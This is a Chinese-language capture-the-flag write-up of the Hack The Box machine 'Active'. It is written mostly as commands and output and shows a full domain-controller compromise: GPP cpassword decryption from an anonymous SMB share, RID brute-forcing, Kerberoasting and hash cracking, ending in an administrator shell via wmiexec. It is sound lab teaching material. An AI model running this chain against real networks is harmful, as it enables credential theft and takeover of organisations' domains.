靶场:Hack The Box
系统:windows
内容:AD基本操作,GPP,Kerberoasting
一个标准的教学靶机。
扫描端口情况。
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -14m12s
| smb2-time:
| date: 2024-12-12T07:21:17
|_ start_date: 2024-12-07T09:05:59
空账号枚举smb信息。
~/D/a $smbclient -NL $IP
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
就一个不常见的文件夹Replication,将所有内容递归下载。
~/D/a $smbclient //$IP/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 10:37:44 2018
.. D 0 Sat Jul 21 10:37:44 2018
active.htb D 0 Sat Jul 21 10:37:44 2018
smb: \> RECURSE on
smb: \> PROMPT off
smb: \> mget *
找到一个Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
里面有个用户名svc_tgs,同时有个加密的密码。这是微软的GPP密码。
GPP 密码是以可被解码的方式存储在 Active Directory 的 SYSVOL 文件夹中。具体来说,这些密码是通过 AES 加密保存的,而加密密钥在 Microsoft 的文档中是公开的。
~/D/a $gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
测试下svc_tgs的权限
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
枚举所有域用户。
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --rid-brute
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC 498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 500: ACTIVE\Administrator (SidTypeUser)
SMB 10.10.10.100 445 DC 501: ACTIVE\Guest (SidTypeUser)
SMB 10.10.10.100 445 DC 502: ACTIVE\krbtgt (SidTypeUser)
SMB 10.10.10.100 445 DC 512: ACTIVE\Domain Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 513: ACTIVE\Domain Users (SidTypeGroup)
SMB 10.10.10.100 445 DC 514: ACTIVE\Domain Guests (SidTypeGroup)
SMB 10.10.10.100 445 DC 515: ACTIVE\Domain Computers (SidTypeGroup)
SMB 10.10.10.100 445 DC 516: ACTIVE\Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 517: ACTIVE\Cert Publishers (SidTypeAlias)
SMB 10.10.10.100 445 DC 518: ACTIVE\Schema Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 519: ACTIVE\Enterprise Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.10.100 445 DC 521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.10.100 445 DC 571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.10.100 445 DC 572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.10.100 445 DC 1000: ACTIVE\DC$ (SidTypeUser)
SMB 10.10.10.100 445 DC 1101: ACTIVE\DnsAdmins (SidTypeAlias)
SMB 10.10.10.100 445 DC 1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.10.100 445 DC 1103: ACTIVE\SVC_TGS (SidTypeUser)
再次以svc_tgs身份登录smb,刚才不可读的用户文件夹下载下来。
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
~/D/a $smbclient //$IP/Users -U 'svc_tgs%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 14:39:20 2018
.. DR 0 Sat Jul 21 14:39:20 2018
Administrator D 0 Mon Jul 16 10:14:21 2018
All Users DHSrn 0 Tue Jul 14 05:06:44 2009
Default DHR 0 Tue Jul 14 06:38:21 2009
Default User DHSrn 0 Tue Jul 14 05:06:44 2009
desktop.ini AHS 174 Tue Jul 14 04:57:55 2009
Public DR 0 Tue Jul 14 04:57:55 2009
SVC_TGS D 0 Sat Jul 21 15:16:32 2018
用户文件夹里没找到什么有用的东西。查看有没有服务和用户绑定。
~/D/a/s $impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-12-07 11:21:48.223544
取得服务的TGS hash。
~/D/a/s $impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-12-07 11:21:48.223544
~/D/a/s $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2024-12-12 08:57) 0.2710g/s 2855Kp/s 2855Kc/s 2855KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$15beb8c9ee1a6d1e497ca5873b10a1cf$5f988d42cc06a589c3e5d091da8f331632388270325fef5bd99199c627005a8558c2f8a2138b14793b5585b31907caaad6080abf728a3878fe1b9ad2b91ac4efda356b6f6ca149d04fa9e6f09bf95e85752e16f7c9b1ee2fab7634a2f56f8c48a45a591f0f2410f0cc2fafea700aa51b3672bc52af85bcdbebf9f07f687e2fef4905d240a598a84d469d6e5029ab2cd3fac4918012e363e67132c2681e75b97fcd550560994cf3efd1f3a76e267c33e60456d8726802b95eaf40db385cbbb2820d6fadfc7c991c6c96f511c13c1e2a152c33b4496000decf4926b5de45b09745a041255e875f8543ed496932eaa2aa818fb7e6625ccefc1efdf50e607a6ee0629bfc6b3cc4ce25ad997afaeacb7b1e1b138b00131dba49d76ce6a57d34e9733e5ac542dc13bf765849c731470d913edafe3b422485c2880e3ce9b6d91469f6f5d6c0ba51152acd2267de34a57cffabbcbeae4e10540737c3eb23ad587269d2d10b5ff2d9d5cc12d15b54c1fa27d8114374c5cabe7f9461ee1b6926c31b6366d9a7706bc9e212caaaae7613615894de6877293bd33ebf2ba7ade4591d756866729bd0300be4ee59cdb7ff7e2b6dd6a311f013e5b6aa87d2a42ead5995ad5cbb244fa9e4a8395eb4aec10920d66568a289fd7b54768fa9e8b907c6784040b24ee9ebe010229306e51ff7813455a5c29d3448e7aa94698fe4551d1fcd161975374d1dec650154d06eff3b3c232ab782e32c812f640579d0352a05f9d4843109e273604fc86501cd5d5d34136c1e850dbf08d0222721d4c4a586570981140da4ee1e0b84b24f21fa686b5d14854a75a3909ef57a14f140a2b04de497a09e7d3da3dd83ebe8c5eeed27eb05e390750a80b3fd88f6b8ad5ed64de58dfbcf11af72a2f94c7c7491e1f1037fa85830bcbaeefd11b05dabe72824def22621743f7831ed38fd7ddc968933303a4d3376684ef02bd561be59b0412cf361a23fb21d4a9d18b90f4e6e42b5c78a8d7ec2d26e7ffd38933acb50b3ef9bf993ff2898ea82c6b361d6afd44deb5e07960b8623e7b13271ca5175133540b1192303baba9f06c2b28a310cc8fc321a0491897fd4e9d4c6d2cf02b169c67c1019733ef43239d8a69a9f034d2086c9950f0968bdc18544b61e3a214d8c664f4109e09558f508155c5db2b75667170b07a04a72b89e206bb12ee374d0ab0ead46b2ac919a7c6ca945251d95a2762c328143dc6c0ad6d93b48ff36ca90c08292a2f7f5b80f
破解后可以得到administrator密码,并登录shell。
~/D/a/s $netexec smb $IP -u administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
~/D/a/s $impacket-wmiexec $DOMAIN/administrator:'Ticketmaster1968'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator